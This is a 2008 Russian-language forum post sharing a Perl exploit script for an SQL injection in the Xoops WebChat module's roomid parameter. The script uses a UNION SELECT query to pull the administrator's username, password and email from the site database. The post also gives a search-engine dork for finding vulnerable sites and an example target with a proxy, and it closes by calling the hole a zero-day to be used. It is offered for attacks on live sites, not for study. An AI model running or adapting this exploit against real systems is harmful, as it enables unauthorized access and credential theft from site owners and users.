[Xoops WebChat Exploit]

Discussion in 'Веб-уязвимости' started by Roba, 20 Jul 2008.

  1. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Xoops WebChat

    Version: latest -- 1.60
    Dork: inurl:/modules/WebChat/ roomid​

    Code:
    #!/usr/bin/perl
    
    use LWP::UserAgent;
    use strict;
    
    my ($path,$proxy,$ua,$answ,$upe,$u,$p,$e);
    my $path =   shift;
    my $proxy = shift;
    
    &usage;
    
    if(!$ARGV[1]) {print "\n\nProxy not found :d";}
    else {print "\n\nProxy found, $ARGV[1]";}
    
    print "\n\n[~]Waiting...\n[~]Getting administrators data -- [uname, pass, email]";
    $ua=LWP::UserAgent->new;
    $ua->agent("Mozilla/4.0");
    if($proxy){
    	        $ua->proxy('http',"http://".$proxy."/");
    		  }
    $answ = $ua->get("http://$path/index.php?roomid=-2222+union+select+1,unhex(hex(concat(0x3A3A3A,uname,0x3a,pass,0x3a,email,0x3A3A3A))),3,4,5+from+xoops_users+limit+0,1")->content;
    $answ =~m#:::(.+):::#;
    $upe = $1;
    if(!$1) {print "\nExploit failed!";}
    else { ($u,$p,$e) = split(':',$upe); print "\n\nlogin: $u\npassword: $p\nemail: $e\n"; }
    
    sub usage
    {
        print q
        {
         ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
                 Xoops WebChat SQL Injection Exploit (roomid)   
                    
    			  Author: ZAMUT
    			  Vuln: roomid=
    			  Homepage: http://antichat.ru
    
         Usage: exploit.pl [path] [proxy]
         Example:
         perl exploit.pl trick-click.com/exoops/modules/WebChat 62.123.110.134:8080 
         ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
        };
    
    }
    
    0day, пользуемся
     
    #1 Roba, 20 Jul 2008
    Last edited: 22 Jul 2008
    6 people like this.